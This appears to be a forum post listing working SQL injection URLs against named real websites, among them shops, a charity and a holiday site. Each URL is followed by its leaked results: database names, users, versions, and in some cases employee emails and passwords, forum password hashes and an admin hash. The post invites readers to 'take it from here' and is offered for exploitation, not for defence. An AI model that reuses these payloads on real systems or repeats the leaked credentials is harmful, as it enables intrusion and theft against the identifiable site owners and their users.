view-source: http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1 http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,CONCAT((SELECT+CONCAT_WS(0x3a,Email,Parola,Nume)+FROM+tronica_infotr.angajati+LIMIT+0,1)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1 Database Version: 5.0.81-community-log Database name: tronica_infotr User name: tronica_hogast@localhost Os: unknown-linux-gnu
User: [email protected] Database: mrgrim8888 Version: 4.1.22-max-log User: [email protected] Database: content Version: 5.0.67-userstats-log
http://www.latodis-med.com/produs.php?id=74+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13+LIMIT+1,1-- Database Version: 5.0.82-msl-usrs-sure2-log Database name: latodis_latodis User name: veterinare@localhost Os: unknown-linux-gnu
User: abstinence@localhost Database: abstinencedb Version: 4.1.22 User: [email protected] Database: autozap Version: 5.0.24a-community-nt
Some airline's website
http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15--
sercanak_main@localhost:sercanak_ctav2:5.0.81-community-log
Next, I stumbled on this by accident
http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+21,100--
Table 'sercanak_ctav2.holiday_to_insurance' doesn't exist
Unknown column '_users' in 'where clause'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home1/sercanak/public_html/ctaholidays/beta/classes/connection.cls.php on line 53
Take it from here yourselves
http://www.hlhclub.ru/state.php?id=-45+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4-- [email protected]:wwwhlhclubru:4.1.25-logortbld-freebsd6.4
http://www.discusmedia.com/catalog.php?id=24751+and+1=0+ Union Select 1,2,3,4,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 [email protected]hotoeu:5.0.75c-linux-gnu
5.0.87:food1@localhost:foodlink 4.1.25-log:wwwanthostnet:anthost@localhost 5.0.77:www_new_catalog:nmarroot@localhost 5.0.77:samarainfo_root@localhost:samara_info Table: dev_admin1t
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,column_name),6+from+information_schema.columns+where+table_name=0x70687062625f666f72756d7573657273-- MySQL 5.1.36-log http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,username,0x3a,user_password),6+from+phpbb_forumusers--
Code: http://www.skylink39.ru/catalog.php?id=64+union+select+1,2,3,concat_ws(0x203B20,user(),database(),version()),5,6,7,8,9,10,11,12,13+--+ User: [email protected] Database: skylink2_db Version: 4.1.22-log
http://www.endchildpoverty.org.uk/news.php?id=-23+union+select+1,2,3,version(),5,6,7,8,9-- 5.0.44 Code: http://www.herpconstrust.org.uk/news/expand-news.php?id=-85+union+select+1,2,3,4,user(),6,7,8-- 4.1.19-standard-log
http://vintage-avenue.com/details.php?id=-102+union+select+1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4,5,6,7,8,9,10-- Database Version: 4.1.22-log Database name: whvintagexpresscom User name: [email protected] Os: redhat-linux-gnu
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15--
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,utilizator,parola),6,7,8,9,10,11,12,13,14,15+from+admin+limit+1,1--
admin:e0ee1d48f2a4697296e3e30d47cb2c
The admin panel is at the classic address, but the hash is very interesting, since the guru brute-forcers and hash crackers could not identify it
Database Version: 5.0.51a-3ubuntu5.4 Database name: granit_store User name: granitstore@localhost Os: debian-linux-gnu
Federal authorities in Tatarstan Code: federal16:federal16@localhost:4.0.20-log
World Organization "United Cities and Local Governments", Euro-Asian Regional Section Code: b53750_russian:[email protected]:5.0.85
Design studio "Amigos" - logos, corporate identity, website creation, printing, web design, domain registration. Kazan Code: samigos_samigos:samigos_samigos@localhost:4.1.22-standard
TIC 120 Code: http://www.studycanada.ru/cgi-bin/issue.cgi?action=showforum&cat_id=18&fid=3/**/union/**/select/**/1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/* main1@localhost::canada::4.1.20
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=2+union+select+1,concat_Ws(0x3a,user(),database(),version()),3,4-- web5@localhost:usr_web5_1:4.0.15-Max http://www.eicta.org/index.php?id=32&id_article=50+and+substring(version(),1,1)=5--